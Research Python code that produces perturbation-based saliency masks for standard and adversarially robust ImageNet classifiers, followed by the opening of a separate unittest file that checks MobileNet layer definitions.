    parser = argparse.ArgumentParser(description='Input parameters for meaningful perturbation explanation of the image')

    # Add the parameters, positional/optional (here only optional)
    parser.add_argument('--mask_init', default='circular', type=str,
                        choices=['circular', 'ones', 'random'],
                        help='random|circular|ones. Default - circular')
    parser.add_argument('--mask_init_size', type=int,
                        help='Size of mask to be initialized. Default=224', default=224,
                        )
    parser.add_argument('--img_dir_path', help='Path to the image directory')
    parser.add_argument('--out_path',
                        help='Path of the output directory where you want to save the results (Default is ./)')
    parser.add_argument('--tv_beta', type=float,
                        help='TV_Beta value', default=3.0,
                        )
    parser.add_argument('--tv_coeff', type=float,
                        help='TV Coefficient value', default=1e-2,
                        )
    parser.add_argument('--l1_coeff', type=float,
                        help='L1 coefficient value', default=1e-4,
                        )
    parser.add_argument('--category_coeff', type=float,
                        help='Category coefficient value', default=1,
                        )
    parser.add_argument('--learning_rate', type=float,
                        help='Learning rate', default=0.1,
                        )
    parser.add_argument('--num_iter', type=int,
                        help='Maximum Iterations', default=300,
                        )
    parser.add_argument('--seed', type=int,
                        help='Seed for reproducibility.', default=None,
                        )
    parser.add_argument('--jitter', type=int,
                        help='Jitter. Default=4', default=4,
                        )
    parser.add_argument('--blur_radius', type=int,
                        help='Blur Radius. Default=10', default=10,
                        )
    parser.add_argument('--start_idx', type=int,
                        help='Start index for selecting images. Default: 0', default=0,
                        )
    parser.add_argument('--end_idx', type=int,
                        help='End index for selecting images. Default: 1735', default=1735,
                        )
    parser.add_argument('--idx_flag', type=int,
                        help=f'Flag whether to use some images in the folder (1) or all (0). '
                             f'This is just for testing purposes. '
                             f'Default=0', default=0,
                        )
    parser.add_argument('--if_save_npy', type=int, choices=range(2),
                        help='Flag whether to save npy version of masks or not. Default=Yes (1)',
                        default=1,
                        )
    parser.add_argument('--if_save_plot', type=int, choices=range(2),
                        help='Flag whether to save plot or not. Default=No (0)',
                        default=0,
                        )
    parser.add_argument('--if_save_mask_evolution', type=int, choices=range(2),
                        help='Flag whether to save evolution of mask or not. Default=No (0)',
                        default=0,
                        )
    parser.add_argument('--if_noise', type=int, choices=range(2),
                        help='Flag whether to add Gaussian noise to the image or not before processing. Default=No (0)',
                        default=0,
                        )
    parser.add_argument('--noise_seed', type=int,
                        help='Seed for Gaussian noise. Default=0', default=0,
                        )
    parser.add_argument('--noise_mean', type=float,
                        help='Mean of gaussian noise. Default: 0', default=0,
                        )
    parser.add_argument('--noise_var', type=float,
                        help='Variance of gaussian noise. Default: 0.1', default=0.1,
                        )

    # Parse the arguments
    args = parser.parse_args()

    if args.seed is not None:
        print(f'Using the numpy seed: {args.seed}')
        np.random.seed(seed=args.seed)

    if args.out_path is None:
        args.out_path = './'
    args.out_path = os.path.abspath(args.out_path) + '/'

    if args.img_dir_path is None:
        print("\nImage Dir Path not given.\nExiting")
        sys.exit(0)
    elif os.path.isdir(args.img_dir_path):
        args.img_dir_path = os.path.abspath(args.img_dir_path)
    else:
        print('\nIncorrect dir path.\nExiting\n')
        sys.exit(1)

    if args.num_iter < 0:
        parser.error("-mi/--num_iter: must be a positive integer")

    return args

########################################################################################################################
class DataProcessing:
    def __init__(self, data_path, img_idxs=[0, 1], idx_flag=1):
        self.data_path = data_path
        if data_path == abs_path(settings.imagenet_val_path):
            aa = img_name_list[img_idxs[0]:img_idxs[1]]
            self.img_filenames = [os.path.join(data_path, f'{ii}.JPEG') for ii in aa]
        else:
            self.img_filenames = []
            for file in glob.glob(os.path.join(data_path, "*.JPEG")):
                self.img_filenames.append(file)
            self.img_filenames.sort()
            self.img_filenames = self.img_filenames[:50]

        print(f'\nNo. of images to be analyzed are {len(self.img_filenames)}\n')
        if idx_flag == 1:
            print('Only producing results for 1 image')
            img_idxs = [0]
            self.img_filenames = [self.img_filenames[i] for i in img_idxs]

    def __getitem__(self, index):
        y = self.get_image_class(os.path.join(self.data_path, self.img_filenames[index]))
        return y, os.path.join(self.data_path, self.img_filenames[index])

    def __len__(self):
        return len(self.img_filenames)

    def get_image_class(self, filepath):
        base_dir = '/home/naman/CS231n/heatmap_tests/'

        # ImageNet 2012 validation set images?
        with open(os.path.join(settings.imagenet_class_mappings, "ground_truth_val2012")) as f:
            # with open(os.path.join(base_dir, "imagenet_class_mappings", "ground_truth_val2012")) as f:
            ground_truth_val2012 = {x.split()[0]: int(x.split()[1])
                                    for x in f.readlines() if len(x.strip()) > 0}

        with open(os.path.join(settings.imagenet_class_mappings, "synset_id_to_class")) as f:
            # with open(os.path.join(base_dir, "imagenet_class_mappings", "synset_id_to_class")) as f:
            synset_to_class = {x.split()[1]: int(x.split()[0])
                               for x in f.readlines() if len(x.strip()) > 0}

        def get_class(f):
            # File from ImageNet 2012 validation set
            ret = ground_truth_val2012.get(f, None)
            if ret is None:
                # File from ImageNet training sets
                ret = synset_to_class.get(f.split("_")[0], None)
            if ret is None:
                # Random JPEG file
                ret = 1000
            return ret

        image_class = get_class(filepath.split('/')[-1])
        return image_class

########################################################################################################################
def load_data(img_dir, batch_size=1, img_idxs=[0, 1], idx_flag=1):
    data = DataProcessing(img_dir, img_idxs=img_idxs, idx_flag=idx_flag)
    test_loader = torch.utils.data.DataLoader(data, batch_size=1)
    return test_loader, len(data)

########################################################################################################################
def numpy_to_torch(img, requires_grad=True):
    if len(img.shape) < 3:
        output = np.float32([img])
    else:
        output = np.transpose(img, (2, 0, 1))
    output = torch.from_numpy(output)
    if use_cuda:
        output = output.to('cuda')  # cuda()
    output.unsqueeze_(0)
    v = Variable(output, requires_grad=requires_grad)
    return v

########################################################################################################################
def unnormalize(img):
    means = [0.485, 0.456, 0.406]
    stds = [0.229, 0.224, 0.225]
    preprocessed_img = img.copy()
    for i in range(3):
        preprocessed_img[:, :, i] = preprocessed_img[:, :, i] * stds[i]
        preprocessed_img[:, :, i] = preprocessed_img[:, :, i] + means[i]
    return preprocessed_img

########################################################################################################################
def unnormalize_madry(img):
    means = [0, 0, 0]
    stds = [1, 1, 1]
    preprocessed_img = img.copy()
    for i in range(3):
        preprocessed_img[:, :, i] = preprocessed_img[:, :, i] * stds[i]
        preprocessed_img[:, :, i] = preprocessed_img[:, :, i] + means[i]
    return preprocessed_img

########################################################################################################################
def normalize(img):
    # NOTE: despite its name, this applies the same scaling as `unnormalize`
    # (multiply by std, then add the mean) and then adds a batch dimension.
    means = [0.485, 0.456, 0.406]
    stds = [0.229, 0.224, 0.225]
    preprocessed_img = img.copy()
    for i in range(3):
        preprocessed_img[:, :, i] = preprocessed_img[:, :, i] * stds[i]
        preprocessed_img[:, :, i] = preprocessed_img[:, :, i] + means[i]
    preprocessed_img = np.expand_dims(preprocessed_img, 0)
    return preprocessed_img

########################################################################################################################
def create_blurred_circular_mask(mask_shape, radius, center=None, sigma=10):
    assert (len(mask_shape) == 2)
    if center is None:
        x_center = int(mask_shape[1] / float(2))
        y_center = int(mask_shape[0] / float(2))
        center = (x_center, y_center)
    y, x = np.ogrid[-y_center:mask_shape[0] - y_center, -x_center:mask_shape[1] - x_center]
    mask = x * x + y * y <= radius * radius
    grid = np.zeros(mask_shape)
    grid[mask] = 1
    if sigma is not None:
        grid = scipy.ndimage.filters.gaussian_filter(grid, sigma)
    return grid

########################################################################################################################
def create_blurred_circular_mask_pyramid(mask_shape, radii, sigma=10):
    assert (len(mask_shape) == 2)
    num_masks = len(radii)
    masks = np.zeros((num_masks, 3, mask_shape[0], mask_shape[1]))
    for i in range(num_masks):
        masks[i, :, :, :] = create_blurred_circular_mask(mask_shape, radii[i], sigma=sigma)
    return masks

########################################################################################################################
def test_circular_masks(model, o_img, m_size, upsample, gt_category, preprocess_image,
                        radii=np.arange(0, 175, 5), thres=1e-2,
                        ):
    # net_transformer = get_ILSVRC_net_transformer(net)
    size = 224
    masks = create_blurred_circular_mask_pyramid((m_size, m_size), radii)
    masks = 1 - masks
    u_mask = upsample(torch.from_numpy(masks)).float().to('cuda')
    num_masks = len(radii)
    img = preprocess_image(np.float32(o_img) / 255, size)

    gradient = np.zeros((1, 1000))
    gradient[0][gt_category] = 1

    # ipdb.set_trace()
    scores = np.zeros(num_masks)
    batch_masked_img = []
    for i in range(num_masks):
        null_img = preprocess_image(get_blurred_img(np.float32(o_img)), size)  # TODO: blurred image operating on BGR
        masked_img = img.mul(u_mask[i]) + null_img.mul(1 - u_mask[i])
        outputs = F.softmax(model(masked_img), dim=1)
        scores[i] = outputs[0, gt_category].cpu().detach()
        batch_masked_img.append(masked_img)

    img_output = torch.nn.Softmax(dim=1)(model(img)).cpu().detach()
    orig_score = img_output[0, gt_category]

    percs = (scores - scores[-1]) / float(orig_score - scores[-1])
    try:
        first_i = np.where(percs < thres)[0][0]
    except:
        first_i = -1
    return radii[first_i]

########################################################################################################################
def get_blurred_img(img, radius=10):
    img = Image.fromarray(np.uint8(img))
    blurred_img = img.filter(ImageFilter.GaussianBlur(radius))
    return np.array(blurred_img) / float(255)

########################################################################################################################
def pytorch_preprocess_image(img, size):
    transform = transforms.Compose([
        transforms.ToPILImage(),
        transforms.Resize((size + 32, size + 32)),  # 224+32 = 256
        transforms.CenterCrop(size),
        transforms.ToTensor(),
    ])
    preprocessed_img_tensor = transform(np.uint8(255 * img))

    means = [0.485, 0.456, 0.406]
    stds = [0.229, 0.224, 0.225]
    preprocessed_img = preprocessed_img_tensor.permute(1, 2, 0).numpy()[:, :, ::-1]
    preprocessed_img = (preprocessed_img - means) / stds
    if use_cuda:
        preprocessed_img_tensor = torch.from_numpy(preprocessed_img).to('cuda')
    else:
        preprocessed_img_tensor = torch.from_numpy(preprocessed_img)
    # preprocessed_img_tensor = torch.from_numpy(preprocessed_img_tensor)
    preprocessed_img_tensor.requires_grad = False
    preprocessed_img_tensor = preprocessed_img_tensor.permute(2, 0, 1)
    preprocessed_img_tensor.unsqueeze_(0)
    preprocessed_img_tensor = preprocessed_img_tensor.float()
    preprocessed_img_tensor.requires_grad = False
    return preprocessed_img_tensor

########################################################################################################################
def madry_preprocess_image(img, size):
    transform = transforms.Compose([
        transforms.ToPILImage(),
        transforms.Resize((size + 32, size + 32)),  # 224+32 = 256
        transforms.CenterCrop(size),
        transforms.ToTensor(),
    ])
    preprocessed_img_tensor = transform(np.uint8(255 * img))

    means = [0, 0, 0]
    stds = [1, 1, 1]
    preprocessed_img = preprocessed_img_tensor.permute(1, 2, 0).numpy()[:, :, ::-1]
    preprocessed_img = (preprocessed_img - means) / stds
    if use_cuda:
        preprocessed_img_tensor = torch.from_numpy(preprocessed_img).to('cuda')
    else:
        preprocessed_img_tensor = torch.from_numpy(preprocessed_img)
    # preprocessed_img_tensor = torch.from_numpy(preprocessed_img_tensor)
    preprocessed_img_tensor.requires_grad = False
    preprocessed_img_tensor = preprocessed_img_tensor.permute(2, 0, 1)
    preprocessed_img_tensor.unsqueeze_(0)
    preprocessed_img_tensor = preprocessed_img_tensor.float()
    preprocessed_img_tensor.requires_grad = False
    return preprocessed_img_tensor

########################################################################################################################
def tv_norm(input, tv_beta):
    img = input[0, 0, :]
    row_grad = torch.abs((img[:-1, :] - img[1:, :])).pow(tv_beta).sum()
    col_grad = torch.abs((img[:, :-1] - img[:, 1:])).pow(tv_beta).sum()
    return row_grad + col_grad

########################################################################################################################
def create_random_maks(size, init):
    if init == 'random':
        mask = np.random.rand(size, size)
    elif init == 'ones':
        mask = np.ones((size, size))
    else:
        print('Incorrect Init!\nExiting')
        sys.exit(0)
    return mask

########################################################################################################################
def add_text(x, text, x_pt, size, scale):
    # --- Here I created a white background to include the text ---
    text_patch = np.zeros((25, x.shape[1], 3), np.uint8)
    text_patch[:] = (255, 255, 255)
    # --- I then concatenated it vertically to the image with the border ---
    vcat = cv2.vconcat((text_patch, x))
    # --- Now I included some text ---
    font = cv2.FONT_HERSHEY_SIMPLEX
    cv2.putText(vcat, text, (x_pt, 15), font, size, (0, 0, 0), scale, 0)
    return vcat

########################################################################################################################
def save_mask(mask, label, label_prob, max_prob, max_label, save_path, ind, tot_iters, im_sz, f_time,
              model_name, **kwargs):
    # label is gt_category
    category_map_dict = eutils.imagenet_label_mappings()

    mask = get_blurred_img(255 * mask, 1)
    mask = 1 - mask
    aa = cv2.applyColorMap(np.uint8(255 * mask), cv2.COLORMAP_VIRIDIS)
    aa = cv2.resize(aa, (im_sz, im_sz))
    aa = add_text(aa, 'Target: {} {:.3f}'.format(category_map_dict[label].split(',')[0], label_prob),
                  **kwargs)  # x_pt=50, scale=1, size=0.35)
    aa = add_text(aa, 'Top-1: {} {:.3f}'.format(category_map_dict[max_label].split(',')[0], max_prob),
                  **kwargs)
    aa = add_text(aa, 'Index is: {:3d}/{}'.format(ind, tot_iters), **kwargs)
    temp_path = os.path.join(save_path, f'evolution_mask_time_{f_time}/{model_name}')
    eutils.mkdir_p(temp_path)
    cv2.imwrite(os.path.join(temp_path, "Model_{}_{:03d}_mask_{}.png".format(model_name, ind, label)), aa)

########################################################################################################################
def add_gaussian_noise(orig_img, mean=0, var=0.1, seed=0):
    ## orig_img is BGR format
    aa = orig_img.copy()
    aa = aa[:, :, ::-1]  # converting BGR to RGB
    aa = skimage.util.random_noise(aa, mode='gaussian', mean=mean, var=var,
                                   seed=seed)  # numpy, dtype=float64, range (0, 1)
    aa = Image.fromarray(np.uint8(aa * 255))  # convert noisy Image to PIL format
    aa = np.asarray(aa)  # numpy image, dtype=uint8, range (0-255) (RGB format)
    aa = aa[:, :, ::-1]  # converting RGB to BGR
    return aa

########################################################################################################################
def save_init_mask(numpy_mask, save_path, img_name, f_time, model_name, save_npy=0, post_pro=0):
    if save_npy == 1:
        temp_path = os.path.join(save_path, f'time_{f_time}_'
                                            f'evolution_mask_'
                                            f'imN_{img_name}/Model_{model_name}')
        eutils.mkdir_p(temp_path)
        temp_npy_path = os.path.join(temp_path, f"imN_{int(img_name.split('_')[-1]):05d}_"
                                                f"postPro_{post_pro}_"
                                                f"init_mask_"
                                                f"{model_name}.npy")
        np.save(temp_npy_path, numpy_mask)

########################################################################################################################
if __name__ == '__main__':
    s_time = time.time()
    f_time = ''.join(str(s_time).split('.'))
    args = get_arguments()

    #######################
    ## #Hyperparameters
    img_shape = 224
    args.save_path = args.out_path
    tv_beta = args.tv_beta
    learning_rate = args.learning_rate
    max_iterations = args.num_iter
    l1_coeff = args.l1_coeff
    tv_coeff = args.tv_coeff
    size = 224
    jitter = args.jitter
    category_coeff = args.category_coeff
    blur_radius = args.blur_radius

    im_label_map = eutils.imagenet_label_mappings()

    ###################################
    data_loader, img_count = load_data(args.img_dir_path, batch_size=1,
                                       img_idxs=[args.start_idx, args.end_idx],
                                       idx_flag=args.idx_flag)

    ## DO NOT JUST MAKE ATTACKER MODEL AS FALSE IN THIS CODE
    model_names = []
    model_names.append('pytorch')
    model_names.append('googlenet')
    model_names.append('madry')  # Robust_ResNet
    model_names.append('madry_googlenet')  # Robust GoogleNet
    print(model_names)

    preprocessing_fns = {'pytorch': pytorch_preprocess_image,
                         'madry': madry_preprocess_image,
                         'madry_googlenet': madry_preprocess_image,
                         'googlenet': pytorch_preprocess_image}
    load_model_fns = {'pytorch': eutils.load_orig_imagenet_model,
                      'madry': eutils.load_madry_model,
                      'madry_googlenet': eutils.load_madry_model,
                      'googlenet': eutils.load_orig_imagenet_model}
    load_model_args = {'pytorch': 'resnet50',
                       'madry': 'madry',
                       'madry_googlenet': 'madry_googlenet',
                       'googlenet': 'googlenet'}
    unnormalize_fn_dict = {'pytorch': unnormalize,
                           'madry': unnormalize_madry,
                           'madry_googlenet': unnormalize_madry,
                           'googlenet': unnormalize}
    heatmaps = {'pytorch': 0, 'madry': 0, 'madry_googlenet': 0, 'googlenet': 0}
    probs_dict = {'pytorch': 0, 'madry': 0, 'madry_googlenet': 0, 'googlenet': 0}
    final_probs_dict = {'pytorch': 0, 'madry': 0, 'madry_googlenet': 0, 'googlenet': 0}
    prepro_images = {'pytorch': 0, 'madry': 0, 'madry_googlenet': 0, 'googlenet': 0}
    l1_loss_dict = {'pytorch': [], 'madry': [], 'madry_googlenet': [], 'googlenet': []}
    tv_loss_dict = {'pytorch': [], 'madry': [], 'madry_googlenet': [], 'googlenet': []}
    cat_loss_dict = {'pytorch': [], 'madry': [], 'madry_googlenet': [], 'googlenet': []}

    res_mask_npy = np.zeros((len(model_names), img_shape, img_shape))

    #########################################################
    ## #Upsampling fn
    if use_cuda:
        upsample = torch.nn.UpsamplingNearest2d(size=(size, size)).cuda()
    else:
        upsample = torch.nn.UpsamplingNearest2d(size=(size, size))

    ################################################################
    ## Out_path
    # mask_size = 224
    mask_size = args.mask_init_size
    par_name = f'sI_{args.start_idx:04d}_eI_{args.end_idx:04d}_' \
               f'iter_{max_iterations:03d}_' \
               f'blurR_{blur_radius:02d}_seed_{args.seed}_' \
               f'mT_{args.mask_init[:4]}_mS_{mask_size:03d}_' \
               f'ifN_{args.if_noise}_nS_{args.noise_seed}'
    print(f'Par_Name is {par_name}')

    if args.mask_init in ['random', 'ones']:
        orig_mask = create_random_maks(mask_size, args.mask_init)
    # elif args.mask_init == 'ones':
    #     orig_mask = create_random_maks(mask_size, args.mask_init)

    for idx, model_name in enumerate(model_names):
        print(f'\n\nAnalyzing for model: {model_name}')
        load_model = load_model_fns[model_name]
        model_arg = load_model_args[model_name]
        preprocess_image = preprocessing_fns[model_name]
        unnormalize_fn = unnormalize_fn_dict[model_name]

        ## Load Model
        print(f'Loading model: {model_name}')
        model = load_model(arch=model_arg, if_pre=1)  # Returns logits

        for ii, (targ_class, img_path) in enumerate(data_loader):
            batch_time = time.time()
            print(f'Analysing batch: {ii} of size {len(targ_class)}')
            targ_class = targ_class.cpu().item()
            gt_category = targ_class
            # print(f'Orig class label is {targ_class}')
            # print(f'Orig class name is {im_label_map[targ_class]}')

            img_name = img_path[0].split('/')[-1].split('.')[0]
            print(f'Image Name is {img_name}')
            out_dir = os.path.join(args.out_path, f'{img_name}')
            save_path = out_dir
            eutils.mkdir_p(out_dir)

            #####################################
            original_img = cv2.imread(img_path[0], 1)  # BGR Format
            if args.if_noise == 1:
                print('Adding gaussian noise to the image')
                original_img = add_gaussian_noise(original_img, mean=args.noise_mean,
                                                  var=args.noise_var,
                                                  seed=args.noise_seed)  # BGR format

            shape = original_img.shape

            ## Preprocess Image
            print(f'Preprocessing image')
            img = np.float32(original_img) / 255
            img = preprocess_image(img, size + jitter)  # img
            prepro_images[model_name] = img

            ## Checking whether prediction matches the orig label
            # Will break if prediction does not match for any of the models
            outputs = F.softmax(model(img[:, :, :size, :size]), dim=1)
            pred_prob, pred_label = torch.max(outputs, dim=-1)
            pred_prob = pred_prob.cpu().item()
            pred_label = pred_label.cpu().item()
            print(f'Pred class is {pred_label} and prob is {pred_prob}')
            probs_dict[model_name] = pred_prob

            ##################################################
            print(f'Initializing with {args.mask_init} mask')
            if args.mask_init in ['random', 'ones']:
                mask = orig_mask.copy()
            else:
                # CAFFE mask_init
                mask_radius = test_circular_masks(model, original_img, mask_size, upsample,
                                                  gt_category, preprocess_image,
                                                  )
                print(f'Mask Radius is {mask_radius}')
                mask = 1 - create_blurred_circular_mask((mask_size, mask_size), mask_radius,
                                                        center=None, sigma=10)

            # ipdb.set_trace()
            mask = numpy_to_torch(mask)

            #############################
            ## #Save initial mask
            ## if args.if_save_mask_evolution == 1:
            ##     aa = 1 - get_blurred_img(upsample(mask).data.cpu().numpy()[0, 0, :, :]*255,
            ##                              radius=1)
            ##     save_init_mask(aa,
            ##                    save_path, img_name, f_time, model_name,
            ##                    save_npy=args.if_save_npy, post_pro=1)
            #     save_init_mask(upsample(mask).data.cpu().numpy()[0, 0],
            #                    save_path, img_name, f_time, model_name,
            #                    save_npy=args.if_save_npy, post_pro=0)

            ################################
            ## Blurred Image
            null_img = preprocess_image(get_blurred_img(np.float32(original_img), radius=blur_radius),
                                        size + jitter)

            ## Optimizer
            optimizer = torch.optim.Adam([mask], lr=learning_rate)

            ####################################################
            print("Optimizing.. ", end='')
            l1 = []    # l1 loss
            l2 = []    # tv_loss
            l3 = []    # category_loss
            cuml = []
            # iter_true_prob = []
            # iter_max_prob = []
            # iter_max_idx = []
            for i in range(max_iterations):
                if jitter != 0:
                    j1 = np.random.randint(jitter)
                    j2 = np.random.randint(jitter)
                else:
                    j1 = 0
                    j2 = 0

                upsampled_mask = upsample(mask)

                # The single channel mask is used with an RGB image,
                # so the mask is duplicated to have 3 channels
                upsampled_mask = upsampled_mask.expand(1, 3, upsampled_mask.size(2), upsampled_mask.size(3))
                perturbated_input = img[:, :, j1:(size + j1), j2:(size + j2)].mul(upsampled_mask) + \
                                    null_img[:, :, j1:(size + j1), j2:(size + j2)].mul(1 - upsampled_mask)

                outputs = F.softmax(model(perturbated_input), dim=1)

                #######################
                ## Loss
                l1_loss = l1_coeff * torch.sum(torch.abs(1 - mask))
                tv_loss = tv_coeff * tv_norm(mask, tv_beta)
                cat_loss = category_coeff * outputs[0, gt_category]
                loss = l1_loss + tv_loss + cat_loss  ## total loss

                # For plotting the loss function
                l1.append(l1_loss.item())
                l2.append(tv_loss.item())
                l3.append(cat_loss.item())
                cuml.append(loss.item())

                optimizer.zero_grad()
                loss.backward()
                optimizer.step()
                mask.data.clamp_(0, 1)

                #############################
                ## #Evolution plots
                if args.if_save_mask_evolution == 1:
                    max_prob, max_ind = outputs.max(dim=1)
                    kwargs = {'x_pt': 5, 'scale': 1, 'size': 0.35}
                    if args.if_save_plot == 1:
                        save_mask(upsample(mask).cpu().data.numpy()[0, 0, :],
                                  gt_category, outputs[0, gt_category].item(),
                                  max_prob.item(), max_ind.item(),
                                  save_path, i, max_iterations, img_shape, f_time, model_name,
                                  **kwargs)
                    if args.if_save_npy == 1:
                        # if (i+1) % 10 == 0:
                        if i in [299, ]:
                            temp_path = os.path.join(save_path, f'time_{f_time}_'
                                                                f'evolution_mask_'
                                                                f'imN_{img_name}/Model_{model_name}')
                            eutils.mkdir_p(temp_path)
                            temp_npy_path = os.path.join(temp_path,
                                                         f"imN_{int(img_name.split('_')[-1]):05d}_"
                                                         f"postPro_1_"
                                                         f"iter_{i:03d}_"
                                                         f"iterProb_{outputs[0, gt_category].item():.3f}_"
                                                         f"iterMaxProb_{max_prob.item():.3f}_"  # FMP - final_max_prob
                                                         f"iterMaxInd_{max_ind.item():3d}_"
                                                         f"{model_name}.npy")
                            t_mask = 1 - get_blurred_img(upsample(mask).data.cpu().numpy()[0, 0, :, :]*255,
                                                         radius=1)
                            np.save(temp_npy_path, t_mask)

                ################################
                # optimizer.zero_grad()
                # loss.backward()
                # optimizer.step()
                # mask.data.clamp_(0, 1)

            print('Done')
            ## End of Optimization
            ################################################

            if i == max_iterations - 1:
                final_max_prob, final_max_ind = outputs.max(dim=1)
                final_pred_prob = outputs[0, gt_category].cpu().detach().item()
                final_probs_dict[model_name] = final_pred_prob
            print(f'Prob after optimization is {outputs[0, gt_category]}')

            upsampled_mask = upsample(mask)
            mask = upsampled_mask
            mask = mask.cpu().detach().numpy()[0, 0, :]
            mask = get_blurred_img(255 * mask, radius=1)
            mask = 1 - mask

            if args.if_save_npy == 1:
                npy_path = os.path.join(save_path,
                                        f"mp_imN_{int(img_name.split('_')[-1]):05d}_"
                                        f"FTP_{final_pred_prob:.3f}_"  # FTP - final_true_prob
                                        f"FMP_{final_max_prob.item():.3f}_"  # FMP - final_max_prob
                                        f"FMInd_{final_max_ind.item():3d}_{par_name}_"  # FMInd - final_max_ind
                                        f"model_name_{model_name}.npy")
                # npy_path = os.path.join(save_path,
                #                         f"t_{f_time}_imN_{int(img_name.split('_')[-1]):05d}_"
                #                         f"FTP_{final_pred_prob:.3f}_"  # FTP - final_true_prob
                #                         f"FMP_{final_max_prob.item():.3f}_"  # FMP - final_max_prob
                #                         f"FMInd_{final_max_ind.item():3d}_{par_name}_"  # FMInd - final_max_ind
                #                         f"{model_name}.npy")
                np.save(npy_path, mask)

            assert mask.shape[0] == img_shape
            # heatmaps[model_name] = mask
            # res_mask_npy[idx] = mask

            print(f'Batch time is {time.time() - batch_time}\n')

    # #################################
    # if args.idx_flag == 1:
    #     if args.if_save_npy == 1:
    #         ## Saving npy files
    #         # TODO: ADD Orig Image and well as other details (orig_prob, pred_prob, img_path etc).
    #         # TODO: As well as label for each dimensions
    #         npy_path = os.path.join(save_path, f"NPY_{par_name}_time_{f_time}.npy")
    #         np.save(npy_path, res_mask_npy)
    #
    #     j1 = 0
    #     j2 = 0
    #     pytorch_img = prepro_images['pytorch']
    #     madry_img = prepro_images['madry']
    #
    #     pytorch_img = unnormalize(
    #         np.moveaxis(pytorch_img[:, :, j1:(size + j1), j2:(size + j2)][0, :].cpu().detach().numpy().transpose(), 0, 1))
    #     madry_img = unnormalize_madry(
    #         np.moveaxis(madry_img[:, :, j1:(size + j1), j2:(size + j2)][0, :].cpu().detach().numpy().transpose(), 0, 1))
    #
    #     assert np.amax(np.abs(pytorch_img - madry_img)) < 1e-7
    #
    #     ## Plotting
    #     grid = []
    #     grid.append([madry_img, heatmaps['googlenet'], heatmaps['pytorch'], heatmaps['madry']])
    #     # ipdb.set_trace()
    #     googlenet_prob = final_probs_dict['googlenet']
    #     resnet_prob = final_probs_dict['pytorch']
    #     madry_prob = final_probs_dict['madry']
    #     col_labels = ['Orig Image',
    #                   f'GoogleNet\nFinal_Prob:{googlenet_prob:.3f}',
    #                   f'ResNet_MP\nFinal_Prob:{resnet_prob:.3f}',
    #                   f'Madry_ResNet_MP\nFinal_Prob:{madry_prob:.3f}']
    #
    #     text = []
    #     text.append(("%.3f" % probs_dict['madry'],  # Madry prob (pL)
    #                  "%3d" % targ_class,  # Madry Label (pL)
    #                  "%.3f" % probs_dict['pytorch'],  # pytorch_prob (pL)
    #                  "%3d" % targ_class,  # Pytorch Label (pL)
    #                  "%.3f" % probs_dict['googlenet'],  # pytorch_prob (pL)
    #                  "%3d" % targ_class,  # Pytorch Label (pL)
    #                  "%3d" % targ_class,  # label for given neuron (cNL)
    #                  ))
    #
    #     madryProb, madryLabel, pytorchProb, pytorchLabel, googlenetProb, googlenetLabel, trueLabel = zip(*text)
    #     row_labels_left = [(f'Madry: Top-1:\n{im_label_map[int(madryLabel[i])]}: {madryProb[i]}\n',
    #                         f'ResNet: Top-1:\n{im_label_map[int(pytorchLabel[i])]}: {pytorchProb[i]}\n',
    #                         f'GoogleNet: Top-1:\n{im_label_map[int(googlenetLabel[i])]}: {googlenetProb[i]}\n',
    #                         f'Target Label: {int(trueLabel[i])}\n{im_label_map[int(trueLabel[i])]}')
    #                        for i in range(len(madryProb))]
    #
    #     row_labels_right = []
    #
    #     eutils.zero_out_plot_multiple_patch(grid,
    #                                         save_path,
    #                                         row_labels_left,
    #                                         row_labels_right,
    #                                         col_labels,
    #                                         file_name=f'MP_heatmap_{par_name}_time_{f_time}.jpeg',
    #                                         dpi=img_shape,
    #                                         )

    print(f'\nTime taken is {time.time() - s_time}')
    print(f'Time stamp is {f_time}')
    aa = 1
########################################################################################################################
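# Hedged usage sketch (added for illustration; not part of the original source).
# The script's file name is not given, so `mp_explain.py` below is hypothetical;
# the flags shown are the ones defined in get_arguments() above.
#
#   python mp_explain.py --img_dir_path ./images --out_path ./results \
#       --mask_init circular --num_iter 300 --seed 0 --if_save_npy 1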
440148
import torch
import os
import sys
import pickle
sys.path.append(os.path.abspath('../'))
import network_utils as networkUtils
import unittest
import nets as models
from constants import *
import copy

MODEL_ARCH = 'mobilenet'
INPUT_DATA_SHAPE = (3, 224, 224)
LOOKUP_TABLE_PATH = os.path.join('../models', MODEL_ARCH, 'lut.pkl')
DATASET_PATH = '../data/'

model = models.__dict__[MODEL_ARCH](num_classes=10)
network_utils = networkUtils.__dict__[MODEL_ARCH](model, INPUT_DATA_SHAPE, DATASET_PATH)


class TestNetworkUtils_mobilenet(unittest.TestCase):
    def __init__(self, *args, **kwargs):
        super(TestNetworkUtils_mobilenet, self).__init__(*args, **kwargs)

    def check_network_def(self, network_def, input_channels, output_channels, only_num_channels=False):
        self.assertEqual(len(network_def), 28, "network_def length error")
        layer_idx = 0
        for layer_name, layer_properties in network_def.items():
            self.assertEqual(layer_properties[KEY_NUM_IN_CHANNELS], input_channels[layer_idx],
                             "network_def num of input channels error")
            self.assertEqual(layer_properties[KEY_NUM_OUT_CHANNELS], output_channels[layer_idx],
                             "network_def num of output channels error")
            if layer_idx % 2 == 1 and layer_idx != 27:
                self.assertTrue(layer_properties[KEY_IS_DEPTHWISE], "network_def is_depthwise error")
                self.assertEqual(layer_properties[KEY_GROUPS], layer_properties[KEY_NUM_IN_CHANNELS],
                                 "network_def group error")
            else:
                self.assertFalse(layer_properties[KEY_IS_DEPTHWISE], "network_def is_depthwise error")
                self.assertEqual(layer_properties[KEY_GROUPS], 1, "network_def group error")
            if layer_idx == 27 or (layer_idx % 2 == 0 and layer_idx != 0):
                self.assertEqual(layer_properties[KEY_KERNEL_SIZE], (1, 1), "network_def kernel size error")
                self.assertEqual(layer_properties[KEY_PADDING], (0, 0), "network_def padding error")
            else:
                self.assertEqual(layer_properties[KEY_KERNEL_SIZE], (3, 3), "network_def kernel size error")
                self.assertEqual(layer_properties[KEY_PADDING], (1, 1), "network_def padding error")
            if layer_idx != 27:
                self.assertEqual(layer_properties[KEY_LAYER_TYPE_STR], 'Conv2d',
                                 "network_def layer type string error")
            else:
                self.assertEqual(layer_properties[KEY_LAYER_TYPE_STR], 'Linear',
                                 "network_def layer type string error")
            if layer_idx in [0, 3, 7, 11, 23]:
                self.assertEqual(layer_properties[KEY_STRIDE], (2, 2), "network_def stride error")
            else:
                self.assertEqual(layer_properties[KEY_STRIDE], (1, 1), "network_def stride error")

            input_feature_map_spatial_size = [224, 112, 112, 112, 56, 56, 56, 56, 28, 28, 28, 28, 14,
                                              14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 7, 7, 7, 1]
